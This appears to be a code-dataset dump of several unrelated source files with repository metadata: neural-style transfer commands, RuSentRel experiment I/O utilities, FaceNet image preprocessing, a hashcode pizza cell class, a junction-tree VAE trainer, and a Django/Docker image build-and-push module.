!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-8.png' -tv_weight 0 -original_colors 0 -backend cudnn | 0 | 0 | 0 |
4638f5ba6e3f686cec58d6f8ca423b3545ee3d5f | 3,856 | py | Python | io_utils.py | nicolay-r/attitude-extraction-with-attention-and-ds | fb8e9d0d9488363738a88c4c447c7a8cb3e2ec1d | [
"MIT"
] | null | null | null | io_utils.py | nicolay-r/attitude-extraction-with-attention-and-ds | fb8e9d0d9488363738a88c4c447c7a8cb3e2ec1d | [
"MIT"
] | 1 | 2020-12-16T18:21:11.000Z | 2020-12-30T10:08:27.000Z | io_utils.py | nicolay-r/attitude-extraction-with-attention-and-ds | fb8e9d0d9488363738a88c4c447c7a8cb3e2ec1d | [
"MIT"
] | 1 | 2021-03-29T20:58:26.000Z | 2021-03-29T20:58:26.000Z | import logging
from os import path
from os.path import dirname, join
from arekit.common.utils import create_dir_if_not_exists
from arekit.contrib.experiments.cv.default import SimpleCVFolding
from arekit.contrib.experiments.cv.doc_stat.rusentrel import RuSentRelDocStatGenerator
from arekit.contrib.experiments.cv.sentence_based import SentenceBasedCVFolding
from arekit.contrib.experiments.data_io import DataIO
from arekit.contrib.experiments.neutral.annot.rusentrel_three_scale import RuSentRelThreeScaleNeutralAnnotator
from arekit.contrib.experiments.neutral.annot.rusentrel_two_scale import RuSentRelTwoScaleNeutralAnnotator
from arekit.processing.lemmatization.mystem import MystemWrapper
from arekit.source.embeddings.rusvectores import RusvectoresEmbedding
from arekit.source.rusentrel.opinions.formatter import RuSentRelOpinionCollectionFormatter
from arekit.source.rusentrel.synonyms import RuSentRelSynonymsCollection
logger = logging.getLogger(__name__)
| 37.436893 | 110 | 0.747666 | import logging
from os import path
from os.path import dirname, join
from arekit.common.utils import create_dir_if_not_exists
from arekit.contrib.experiments.cv.default import SimpleCVFolding
from arekit.contrib.experiments.cv.doc_stat.rusentrel import RuSentRelDocStatGenerator
from arekit.contrib.experiments.cv.sentence_based import SentenceBasedCVFolding
from arekit.contrib.experiments.data_io import DataIO
from arekit.contrib.experiments.neutral.annot.rusentrel_three_scale import RuSentRelThreeScaleNeutralAnnotator
from arekit.contrib.experiments.neutral.annot.rusentrel_two_scale import RuSentRelTwoScaleNeutralAnnotator
from arekit.processing.lemmatization.mystem import MystemWrapper
from arekit.source.embeddings.rusvectores import RusvectoresEmbedding
from arekit.source.rusentrel.opinions.formatter import RuSentRelOpinionCollectionFormatter
from arekit.source.rusentrel.synonyms import RuSentRelSynonymsCollection
logger = logging.getLogger(__name__)
class RuSentRelBasedExperimentsIOUtils(DataIO):
    """Shared I/O configuration for RuSentRel-based experiments.

    Wires together the resources used across the experiment pipeline:
    lemmatizer (stemmer), synonyms collection, opinion-collection
    formatter, neutral annotator, pre-trained word embedding and the
    cross-validation folding algorithm, and exposes the filesystem
    layout under ``data/`` next to this file.
    """

    def __init__(self, init_word_embedding=True):
        """
        init_word_embedding: bool
            Allows skipping the (slow, large) word-embedding load when
            the embedding is not needed; ``WordEmbedding`` is then None.
        """
        self.__stemmer = MystemWrapper()

        self.__synonym_collection = RuSentRelSynonymsCollection.load_collection(
            stemmer=self.__stemmer,
            is_read_only=True)

        self.__opinion_formatter = RuSentRelOpinionCollectionFormatter

        # You may manually select three-scale mode by commenting one of these two lines below.
        self.__neutral_annotator = self.__init_two_scale_neutral_annotator()
        # self.__neutral_annotator = self.__init_three_scale_neutral_annotator()

        self.__word_embedding = self.__create_word_embedding() if init_word_embedding else None

        self.__cv_folding_algorithm = self.__init_sentence_based_cv_folding_algorithm()

    # region public properties

    @property
    def Stemmer(self):
        return self.__stemmer

    @property
    def SynonymsCollection(self):
        return self.__synonym_collection

    @property
    def NeutralAnnontator(self):
        # NOTE: the (misspelled) property name is kept as-is for
        # backward compatibility with existing callers.
        return self.__neutral_annotator

    @property
    def WordEmbedding(self):
        # None when the instance was created with init_word_embedding=False.
        return self.__word_embedding

    @property
    def OpinionFormatter(self):
        return self.__opinion_formatter

    @property
    def CVFoldingAlgorithm(self):
        return self.__cv_folding_algorithm

    # endregion

    # region private methods

    def __create_word_embedding(self):
        # Reuse the public accessor so the embedding location is
        # defined in exactly one place.
        we_filepath = self.get_word_embedding_filepath()
        logger.info("Loading word embedding: {}".format(we_filepath))
        return RusvectoresEmbedding.from_word2vec_format(filepath=we_filepath,
                                                         binary=True)

    def __init_sentence_based_cv_folding_algorithm(self):
        # Folding is driven by per-document sentence statistics,
        # cached in data/docs_stat.txt.
        return SentenceBasedCVFolding(
            docs_stat=RuSentRelDocStatGenerator(synonyms=self.__synonym_collection),
            docs_stat_filepath=path.join(self.get_data_root(), u"docs_stat.txt"))

    def __init_simple_cv_folding_algorithm(self):
        # Currently unused alternative to the sentence-based folding.
        return SimpleCVFolding()

    def __init_two_scale_neutral_annotator(self):
        return RuSentRelTwoScaleNeutralAnnotator(data_io=self)

    def __init_three_scale_neutral_annotator(self):
        return RuSentRelThreeScaleNeutralAnnotator(data_io=self,
                                                   stemmer=self.__stemmer)

    # endregion

    # region public methods

    def get_data_root(self):
        """Root directory of all experiment data, relative to this file."""
        return path.join(dirname(__file__), u"data/")

    def get_experiments_dir(self):
        """Returns the experiments output directory, creating it if missing."""
        experiments_name = u'rusentrel'
        target_dir = join(self.get_data_root(), u"./{}/".format(experiments_name))
        create_dir_if_not_exists(target_dir)
        return target_dir

    def get_word_embedding_filepath(self):
        """Path of the pre-trained RusVectores word2vec embedding."""
        return path.join(self.get_data_root(), u"w2v/news_rusvectores2.bin.gz")

    # endregion
75cfe90c3d565a83d48164ad50bd25b3298e863e | 1,038 | py | Python | image_utils.py | Raiszo/facenet-testing | 563ff85a2aec50f86a49e1b1054651584872cb02 | [
"MIT"
] | null | null | null | image_utils.py | Raiszo/facenet-testing | 563ff85a2aec50f86a49e1b1054651584872cb02 | [
"MIT"
] | null | null | null | image_utils.py | Raiszo/facenet-testing | 563ff85a2aec50f86a49e1b1054651584872cb02 | [
"MIT"
] | null | null | null | import numpy as np
from scipy.misc import imread, imresize
# Channel-wise statistics of the FaceNet training images: the mean is in
# [0, 1] units, and the variance is converted from the raw 0-255 pixel scale
# before taking the square root.
FACENET_MEAN = np.array([ 0.52591038, 0.40204082, 0.34178183], dtype=np.float32)
FACENET_STD = np.sqrt(np.array([3941.30175781, 2856.94287109, 2519.35791016], dtype=np.float32) / 255.**2)

def preprocess_image(img):
    """Preprocess an image for squeezenet.

    Subtracts the pixel mean and divides by the standard deviation.
    """
    scaled = img.astype(np.float32) / 255.0
    return (scaled - FACENET_MEAN) / FACENET_STD
| 34.6 | 106 | 0.685934 | import numpy as np
from scipy.misc import imread, imresize
def load_image(filename, size=None):
    """Load an image from disk, optionally scaling its shorter side to *size*.

    :param filename: path of the image file
    :param size: target length in pixels of the shorter image side; when
        None the image is returned at native resolution
    :return: the image as a numpy array
    """
    img = imread(filename)
    if size is not None:
        orig_shape = np.array(img.shape[:2])
        min_idx = np.argmin(orig_shape)
        # A float passed to imresize is treated as a uniform scale factor,
        # so both sides are scaled and the shorter side ends up at *size*.
        # (The original also computed an unused `new_shape` here; removed.)
        scale_factor = float(size) / orig_shape[min_idx]
        img = imresize(img, scale_factor)
    return img
# Channel-wise image statistics: mean in [0, 1] units, std converted from
# the 0-255 pixel scale before the square root.
FACENET_MEAN = np.array([ 0.52591038, 0.40204082, 0.34178183], dtype=np.float32)
FACENET_STD = np.sqrt(np.array([3941.30175781, 2856.94287109, 2519.35791016], dtype=np.float32) / 255.**2)
def preprocess_image(img):
    """Preprocess an image for squeezenet.
    Subtracts the pixel mean and divides by the standard deviation.
    """
    # Scale pixels to [0, 1] first, then standardize with the dataset stats.
    return (img.astype(np.float32)/255.0 - FACENET_MEAN) / FACENET_STD
def load_image_batch(filenames, size=160):
    """Load and preprocess *filenames* into one (N, size, size, 3) array."""
    batch = np.zeros((len(filenames), size, size, 3))
    for idx, fname in enumerate(filenames):
        batch[idx] = preprocess_image(load_image(fname, size=size))
    return batch
| 519 | 0 | 46 |
ab65c055bcd0082903a22b251f7cfa1e0ddbad07 | 3,466 | py | Python | pizza_cell.py | hex7c0/google-hashcode | a0aecc6a08fe3ffcdd362c2c4abccd58d9b73937 | [
"MIT"
] | null | null | null | pizza_cell.py | hex7c0/google-hashcode | a0aecc6a08fe3ffcdd362c2c4abccd58d9b73937 | [
"MIT"
] | null | null | null | pizza_cell.py | hex7c0/google-hashcode | a0aecc6a08fe3ffcdd362c2c4abccd58d9b73937 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""PizzaCell class."""
from enum import Enum, unique
from cell import Cell
from slice import Slice
@unique
class Ingredient(Enum):
    """Ingredient enum.

    Single-character codes used to encode pizza cells ('M' = mushroom,
    'T' = tomato); ``@unique`` guarantees the codes stay distinct.
    """
    MUSHROOM = 'M'
    TOMATO = 'T'
class PizzaCell(object):
    """Cell of Pizza.
    :type ingredient: Ingredient or None
    :type top: PizzaCell or None
    :type bottom: PizzaCell or None
    :type right: PizzaCell or None
    :type left: PizzaCell or None
    :type _cell: Cell or None
    :type _slice: Slice or None
    :type _has_mushroom: bool
    """
    # Class-level defaults; instances shadow these once assigned.
    ingredient = None
    top = None
    bottom = None
    right = None
    left = None
    _slice = None
    _cell = None
    _has_mushroom = False

    def __init__(self, ingredient: str):
        """PizzaCell constructor.
        :param ingredient: ingredient in the cell
        :type ingredient: str
        :raises ValueError: if *ingredient* is not a string or not 'M'/'T'
        """
        try:
            ingredient = ingredient.upper()
        except AttributeError:
            # Non-string values (e.g. None, int) cannot name an ingredient.
            raise ValueError("ingredient must be a string, got {!r}".format(ingredient))
        if ingredient == Ingredient.MUSHROOM.value:
            self.ingredient = Ingredient.MUSHROOM
            self._has_mushroom = True
        elif ingredient == Ingredient.TOMATO.value:
            self.ingredient = Ingredient.TOMATO
        else:
            raise ValueError("unknown ingredient: {!r}".format(ingredient))

    @property
    def cell(self) -> Cell:
        """Cell getter.
        :return: cell
        :rtype: Cell
        """
        return self._cell

    @cell.setter
    def cell(self, cell: Cell) -> None:
        """Cell setter.
        :param cell: cell
        :type cell: Cell
        :return:
        :rtype: None
        """
        self._cell = cell

    @property
    def slice(self) -> Slice:
        """Slice getter.
        :return: slice
        :rtype: Slice
        """
        return self._slice

    @slice.setter
    def slice(self, value: Slice) -> None:
        """Slice setter.

        The parameter is named ``value`` to avoid shadowing the ``slice``
        builtin (setters are only ever invoked by assignment, so the
        rename is invisible to callers).
        :param value: slice
        :type value: Slice
        :return:
        :rtype: None
        """
        self._slice = value

    @property
    def mushroom(self) -> bool:
        """This cell has mushroom.
        :return: if mushroom
        :rtype: bool
        """
        return self._has_mushroom

    @property
    def tomato(self) -> bool:
        """This cell has tomato.
        :return: if tomato
        :rtype: bool
        """
        return not self._has_mushroom

    @property
    def x(self) -> int:
        """Return X of this cell.
        :return: x
        :rtype: int
        """
        return self._cell.x

    @property
    def y(self) -> int:
        """Return Y of this cell.
        :return: y
        :rtype: int
        """
        return self._cell.y

    @property
    def id(self) -> int:
        """Return id of this cell.
        :return: id
        :rtype: int
        """
        return self._cell.id

    def set_neighbour(self, direction: str, next_pizza_cell) -> None:
        """Look at next cell.
        :param direction: direction of the next cell
        :param next_pizza_cell: next PizzaCell
        :param direction: str
        :type next_pizza_cell: PizzaCell
        :return:
        :rtype: None
        """
        setattr(self, direction, next_pizza_cell)

    def is_equal(self, cell) -> bool:
        """Check if cell is equal.
        :param cell: different PizzaCell
        :type cell: PizzaCell
        :return:
        :rtype: bool
        """
        return self.ingredient == cell.ingredient
| 19.255556 | 69 | 0.540681 | # -*- coding: utf-8 -*-
"""PizzaCell class."""
from enum import Enum, unique
from cell import Cell
from slice import Slice
@unique
class Ingredient(Enum):
    """Ingredient enum.

    Single-character codes used to encode pizza cells ('M' = mushroom,
    'T' = tomato); ``@unique`` guarantees the codes stay distinct.
    """
    MUSHROOM = 'M'
    TOMATO = 'T'
class PizzaCell(object):
    """Cell of Pizza.
    :type ingredient: Ingredient or None
    :type top: PizzaCell or None
    :type bottom: PizzaCell or None
    :type right: PizzaCell or None
    :type left: PizzaCell or None
    :type _cell: Cell or None
    :type _slice: Slice or None
    :type _has_mushroom: bool
    """
    # Class-level defaults; instances shadow these once assigned.
    ingredient = None
    top = None
    bottom = None
    right = None
    left = None
    _slice = None
    _cell = None
    _has_mushroom = False
    def __init__(self, ingredient: str):
        """PizzaCell constructor.
        :param ingredient: ingredient in the cell
        :type ingredient: str
        :raises ValueError: if *ingredient* is not a string or not 'M'/'T'
        """
        try:
            ingredient = ingredient.upper()
        except AttributeError:
            # Non-string values (e.g. None) cannot name an ingredient.
            raise ValueError
        if ingredient == Ingredient.MUSHROOM.value:
            self.ingredient = Ingredient.MUSHROOM
            self._has_mushroom = True
        elif ingredient == Ingredient.TOMATO.value:
            self.ingredient = Ingredient.TOMATO
        else:
            raise ValueError
    @property
    def cell(self) -> Cell:
        """Cell getter.
        :return: cell
        :rtype: Cell
        """
        return self._cell
    @cell.setter
    def cell(self, cell: Cell) -> None:
        """Cell setter.
        :param cell: cell
        :type cell: Cell
        :return:
        :rtype: None
        """
        self._cell = cell
    @property
    def slice(self) -> Slice:
        """Slice getter.
        :return: slice
        :rtype: Slice
        """
        return self._slice
    @slice.setter
    def slice(self, slice: Slice) -> None:
        """Slice setter.
        NOTE(review): the parameter shadows the ``slice`` builtin; harmless
        here, but consider renaming.
        :param slice: slice
        :type slice: Slice
        :return:
        :rtype: None
        """
        self._slice = slice
    @property
    def mushroom(self) -> bool:
        """This cell has mushroom.
        :return: if mushroom
        :rtype: bool
        """
        return self._has_mushroom
    @property
    def tomato(self) -> bool:
        """This cell has tomato.
        :return: if tomato
        :rtype: bool
        """
        return not self._has_mushroom
    @property
    def x(self) -> int:
        """Return X of this cell.
        :return: x
        :rtype: int
        """
        return self._cell.x
    @property
    def y(self) -> int:
        """Return Y of this cell.
        :return: y
        :rtype: int
        """
        return self._cell.y
    @property
    def id(self) -> int:
        """Return id of this cell.
        :return: id
        :rtype: int
        """
        return self._cell.id
    def set_neighbour(self, direction: str, next_pizza_cell) -> None:
        """Look at next cell.
        :param direction: direction of the next cell
        :param next_pizza_cell: next PizzaCell
        :param direction: str
        :type next_pizza_cell: PizzaCell
        :return:
        :rtype: None
        """
        setattr(self, direction, next_pizza_cell)
    def is_equal(self, cell) -> bool:
        """Check if cell is equal.
        :param cell: different PizzaCell
        :type cell: PizzaCell
        :return:
        :rtype: bool
        """
        return self.ingredient == cell.ingredient
| 0 | 0 | 0 |
beca77095f01db98212b8a9f91256b225a689bb8 | 1,945 | py | Python | moses/junction_tree/trainer.py | GT4SD/moses | 2fb13dc757f82484beaae19140be335affb60c4b | [
"MIT"
] | null | null | null | moses/junction_tree/trainer.py | GT4SD/moses | 2fb13dc757f82484beaae19140be335affb60c4b | [
"MIT"
] | null | null | null | moses/junction_tree/trainer.py | GT4SD/moses | 2fb13dc757f82484beaae19140be335affb60c4b | [
"MIT"
] | null | null | null | import torch.optim as optim
import tqdm
from moses.utils import Logger
import torch
| 35.363636 | 103 | 0.488432 | import torch.optim as optim
import tqdm
from moses.utils import Logger
import torch
class JTreeTrainer:
    """Trainer for the junction-tree VAE model.

    Runs epoch-based optimization with KL annealing (the KL weight is zero
    for the first ``config.kl_start`` epochs, then ``config.kl_w``) and
    periodically checkpoints the model to ``config.model_save``.
    """

    def __init__(self, config):
        self.config = config

    def fit(self, model, data):
        """Fit *model* on the batches yielded by *data*.

        :param model: junction-tree model; called as
            ``model(batch, kl_w)`` and expected to return
            (loss, kl_div, word_acc, topo_acc, assm_acc, steo_acc).
        :param data: iterable of training batches.
        """
        def get_params():
            # Only optimize trainable parameters.
            return (p for p in model.parameters() if p.requires_grad)

        model.train()
        log = Logger()
        n_epoch = self.config.num_epochs
        optimizer = optim.Adam(get_params(), lr=self.config.lr)

        for epoch in range(n_epoch):
            # KL annealing: disable the KL term during warm-up epochs.
            if epoch < self.config.kl_start:
                kl_w = 0
            else:
                kl_w = self.config.kl_w

            word_acc, topo_acc, assm_acc, steo_acc, all_kl = 0, 0, 0, 0, 0
            with tqdm.tqdm(data) as train_dataloader:
                train_dataloader.set_description('Train (epoch #{})'.format(epoch))
                for it, batch in enumerate(train_dataloader):
                    model.zero_grad()
                    loss, kl_div, wacc, tacc, sacc, dacc = model(batch, kl_w)
                    loss.backward()
                    optimizer.step()
                    word_acc += wacc
                    topo_acc += tacc
                    assm_acc += sacc
                    steo_acc += dacc
                    all_kl += kl_div
                    # Running means over the batches seen so far this epoch.
                    postfix = {'kl': all_kl / (it + 1),
                               'word': word_acc / (it + 1) * 100,
                               'topo': topo_acc / (it + 1) * 100,
                               'assm': assm_acc / (it + 1) * 100,
                               'steo': steo_acc / (it + 1) * 100}
                    train_dataloader.set_postfix(postfix)
            log.append(postfix)
            log.save(self.config.log_file)
            if epoch % self.config.save_frequency == 0:
                # Remember the model's device before checkpointing on CPU,
                # then move it back. The original referenced an undefined
                # name ``device`` here, raising NameError on save epochs.
                device = next(model.parameters()).device
                model.to('cpu')
                torch.save(model.state_dict(), self.config.model_save[:-3]+'_{0:03d}.pt'.format(epoch))
                model.to(device)
| 1,786 | -2 | 76 |
ef259f88b97a2ce21f13a711e7f4694b88d463ec | 4,136 | py | Python | src/deploy/builder/stacks/stack_processor.py | werelaxe/drapo | 5f78da735819200f0e7efa6a5e6b3b45ba6e0d4b | [
"MIT"
] | null | null | null | src/deploy/builder/stacks/stack_processor.py | werelaxe/drapo | 5f78da735819200f0e7efa6a5e6b3b45ba6e0d4b | [
"MIT"
] | null | null | null | src/deploy/builder/stacks/stack_processor.py | werelaxe/drapo | 5f78da735819200f0e7efa6a5e6b3b45ba6e0d4b | [
"MIT"
] | null | null | null | import requests
from django.core.files import File
from tempfile import mkdtemp
from shutil import copy, rmtree
import os
import yaml
import zipfile
from django.conf import settings
from docker.client import DockerClient
from docker.models.images import ImageCollection
from docker_registry_client import DockerRegistryClient
from .registry_checker import check_registry
from .models import Stack
# Default docker-compose filename and registry endpoint come from Django settings.
DOCKER_COMPOSE_FILE_DEFAULT_NAME = settings.DOCKER_COMPOSE_FILE_DEFAULT_NAME
DOCKER_REGISTRY_URL = settings.DOCKER_REGISTRY_URL
CALLBACK_URL = f"http://{settings.DEPLOYER_HOSTPORT}/tasks/update/"
# Fail fast at import time if the registry is unreachable, then build the
# module-wide registry and docker clients used by the functions below.
check_registry()
drc = DockerRegistryClient('http://' + settings.DOCKER_REGISTRY_URL)
docker_client = DockerClient()
ic = ImageCollection(docker_client)
| 33.088 | 112 | 0.735493 | import requests
from django.core.files import File
from tempfile import mkdtemp
from shutil import copy, rmtree
import os
import yaml
import zipfile
from django.conf import settings
from docker.client import DockerClient
from docker.models.images import ImageCollection
from docker_registry_client import DockerRegistryClient
from .registry_checker import check_registry
from .models import Stack
# Default docker-compose filename and registry endpoint come from Django settings.
DOCKER_COMPOSE_FILE_DEFAULT_NAME = settings.DOCKER_COMPOSE_FILE_DEFAULT_NAME
DOCKER_REGISTRY_URL = settings.DOCKER_REGISTRY_URL
CALLBACK_URL = f"http://{settings.DEPLOYER_HOSTPORT}/tasks/update/"
# Fail fast at import time if the registry is unreachable, then build the
# module-wide registry and docker clients used by the functions below.
check_registry()
drc = DockerRegistryClient('http://' + settings.DOCKER_REGISTRY_URL)
docker_client = DockerClient()
ic = ImageCollection(docker_client)
class StackProcessingError(Exception):
    """Raised when unpacking, validating or building a stack fails."""
class StackPostProcessingError(Exception):
    """Raised when post-build cleanup or callback notification fails."""
def get_dc_file_path(unpacked_stack_path, docker_compose_file_path):
    """Return the docker-compose file path inside an unpacked stack dir."""
    dc_path = os.path.join(unpacked_stack_path, docker_compose_file_path)
    return dc_path
def unpack_stack(stack_path):
    """Extract the zipped stack at *stack_path* into a fresh temp directory.

    A copy of the archive itself is also placed inside the directory
    (preserved behaviour), and the directory path is returned.

    :param stack_path: path of the stack .zip archive
    :return: path of the temporary directory with the extracted contents
    """
    temp_dir_name = mkdtemp(prefix='build_')
    full_name = os.path.join(temp_dir_name, os.path.basename(stack_path))
    copy(stack_path, full_name)
    # The context manager guarantees the archive handle is closed even if
    # extraction raises (the original leaked the handle on error).
    with zipfile.ZipFile(stack_path, 'r') as zip_ref:
        zip_ref.extractall(temp_dir_name)
    return temp_dir_name
def get_images_for_building(docker_compose_filename):
    """Map image name -> build path for every service with a ``build`` key.

    :param docker_compose_filename: path of a docker-compose YAML file
    :raises StackProcessingError: on unparsable YAML or missing fields
    """
    build_paths = {}
    with open(docker_compose_filename) as handle:
        try:
            parsed = yaml.safe_load(handle)
            for service in parsed['services'].values():
                if 'build' not in service:
                    continue
                build_paths[service['image']] = service['build']
        except yaml.YAMLError as e:
            raise StackProcessingError(f"Can not parse docker-compose config: '{e}'")
        except KeyError as e:
            raise StackProcessingError(f"Invalid docker-compose config. Can not find field: '{e}'")
    return build_paths
def build_images(images_for_building, stack_name):
    """Build every stack image and tag it for the configured registry.

    :raises StackProcessingError: if a build path is not a directory
    """
    for image_name, build_path in images_for_building.items():
        if not os.path.isdir(build_path):
            raise StackProcessingError(f"For image '{image_name}' build path '{build_path}' is not a directory")
        registry_tag = f'{DOCKER_REGISTRY_URL}/{stack_name}_{image_name}:latest'
        ic.build(path=build_path, tag=registry_tag, rm=True)
def push_images(images_for_building, stack_name):
    """Push the freshly built stack images to the docker registry."""
    # Only the image names are needed here; iterate the keys directly
    # instead of unpacking the unused build paths.
    for image_name in images_for_building:
        full_tag = f'{DOCKER_REGISTRY_URL}/{stack_name}_{image_name}:latest'
        ic.push(full_tag)
def clear_images(images_for_building, stack_name):
    """Remove the locally built stack images after they have been pushed."""
    # Only the image names are needed here; iterate the keys directly
    # instead of unpacking the unused build paths.
    for image_name in images_for_building:
        full_tag = f'{DOCKER_REGISTRY_URL}/{stack_name}_{image_name}:latest'
        ic.remove(image=full_tag)
def process_stack(stack, stack_name):
    """Unpack a stack archive, then build, push and clean up its images.

    Side effects: changes the process working directory to the temp dir,
    assigns ``stack.config`` (a Django File wrapping the compose file),
    and removes the temp dir on success.

    :raises StackProcessingError: if the compose file is missing/invalid
    :raises StackPostProcessingError: if cleanup fails
    """
    stack_path = stack.context.file.name
    temp_dir = unpack_stack(stack_path)
    # NOTE(review): process-wide side effect; anything else running in this
    # process sees the changed cwd.
    os.chdir(temp_dir)
    dc_file_path = get_dc_file_path(temp_dir, DOCKER_COMPOSE_FILE_DEFAULT_NAME)
    if not os.path.exists(dc_file_path):
        raise StackProcessingError(f"Can not find docker-compose file: '{dc_file_path}'")
    # NOTE(review): the handle opened here is never explicitly closed; the
    # Django File wrapper keeps it for later reads, so it cannot simply be
    # closed locally — confirm lifecycle with the caller.
    stack.config = File(open(dc_file_path), DOCKER_COMPOSE_FILE_DEFAULT_NAME)
    images_for_building = get_images_for_building(dc_file_path)
    build_images(images_for_building, stack_name)
    push_images(images_for_building, stack_name)
    try:
        # Best-effort cleanup: local images and the temp working directory.
        clear_images(images_for_building, stack_name)
        rmtree(temp_dir)
    except Exception as e:
        raise StackPostProcessingError(e)
def send_update(stack_name):
    """POST a build-finished notification to the deployer callback URL.

    :raises StackPostProcessingError: on a non-2xx callback response
    """
    response = requests.post(CALLBACK_URL + stack_name)
    if not response.ok:
        raise StackPostProcessingError(f"Callback response is not ok: {response}, {response.content}")
def check_images(stack):
    """Return True when every stack image exists in the docker registry."""
    repositories = drc.repositories()
    expected_names = (f"{stack.name}_{image_name}"
                      for image_name in get_images_for_building(stack.config.file.name))
    # all() short-circuits on the first missing image, matching the
    # original flag-and-break loop.
    return all(name in repositories for name in expected_names)
| 3,064 | 56 | 253 |
17670b80b678e8575dd39c563e1e3a2f22fe7ac1 | 45,313 | py | Python | Software/Network plotters/elec_only_OMEGA_plot.py | JonasVind/Master_Project_Code-Plots | f3efea1a30738b119bf6958cc490b940c90e2909 | [
"CC-BY-4.0"
] | null | null | null | Software/Network plotters/elec_only_OMEGA_plot.py | JonasVind/Master_Project_Code-Plots | f3efea1a30738b119bf6958cc490b940c90e2909 | [
"CC-BY-4.0"
